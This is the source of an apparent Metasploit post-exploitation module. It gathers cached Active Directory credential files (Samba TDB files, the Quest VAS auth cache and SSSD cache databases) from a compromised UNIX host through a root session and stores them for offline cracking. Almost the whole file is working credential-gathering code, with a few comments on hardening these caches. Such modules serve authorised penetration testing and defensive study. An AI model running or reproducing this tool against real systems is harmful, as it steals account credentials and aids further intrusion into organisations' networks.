GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/unix_cached_ad_hashes.rb
# Copyright (c) 2015-2018, Cisco International Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Cisco International Ltd nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CISCO INTERNATIONAL LTD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
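# Post module that copies on-disk Active Directory credential caches (Samba
# TDB files, the Quest VAS auth cache and SSSD cache databases) from a UNIX
# host into the framework's loot store.
#
# Defensive context: the module refuses to run unless the session is root, so
# its successful use implies the host was already fully compromised. The files
# it reads are the ones defenders should treat as credential stores: keep them
# readable by root only, audit reads by anything other than the owning
# service, and consider whether offline credential caching is needed at all
# (for SSSD this is governed by the `cache_credentials` setting).
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix
  include Msf::Post::Common

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UNIX Gather Cached AD Hashes',
        'Description' => %q{ Post Module to obtain all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR). },
        'License' => MSF_LICENSE,
        'Author' => [ 'Tim Brown <timb[at]nth-dimension.org.uk>'],
        'Platform' => %w[linux osx unix solaris aix],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Declared side effect: running the module may leave indicators in
          # the target's logs.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
  end

  # Builds the list of candidate cache files, keeps those that exist as
  # regular files on the session host, and hands them to download_loot.
  # Aborts with NoAccess when the session is not root.
  #
  # @return [void]
  def run
    fail_with(Msf::Module::Failure::NoAccess, 'Must be running as root') unless is_root?
    print_status('Finding files')
    files = [ '/var/lib/samba/private/secrets.tdb', '/var/lib/samba/passdb.tdb', '/var/opt/quest/vas/authcache/vas_auth.vdb' ]
    # The SSSD cache file names vary, so they are enumerated on the host.
    # When nothing matches, `ls` may return an error message instead of a
    # path; the file? filter below discards any such line. to_s guards
    # against a nil result from the session.
    files += cmd_exec('ls /var/lib/sss/db/cache_*').to_s.split(/\r\n|\r|\n/)
    files = files.select { |d| file?(d) }
    # select always returns an Array, so an emptiness check is sufficient.
    if files.empty?
      print_error('No cached AD hashes found')
      return
    end
    download_loot(files)
  end

  # Reads each file from the session host and stores its contents as loot.
  # Files that cannot be read (nil or empty result) are reported and skipped
  # rather than being recorded as empty loot entries.
  #
  # @param files [Array<String>] absolute paths on the session host
  # @return [Array<String>] the list that was passed in (result of each)
  def download_loot(files)
    print_status("Looting #{files.count} files")
    files.each do |file|
      # Work on a copy: the caller's strings are left unmodified.
      path = file.chomp
      print_status("Downloading #{path}")
      data = read_file(path)
      if data.nil? || data.empty?
        print_error("Could not read #{path}, skipping")
        next
      end
      basename = path.split('/').last
      # NOTE(review): the same SQLite content type is recorded for every
      # file, including the Samba .tdb files, which are presumably not
      # SQLite databases - confirm whether the label matters to consumers.
      loot_file = store_loot('unix_cached_ad_hashes', 'application/vnd.sqlite3', session, data, "unix_cached_ad_hashes_#{basename}", 'Cached AD Hashes File')
      print_good("File stored in: #{loot_file}")
    end
  end
end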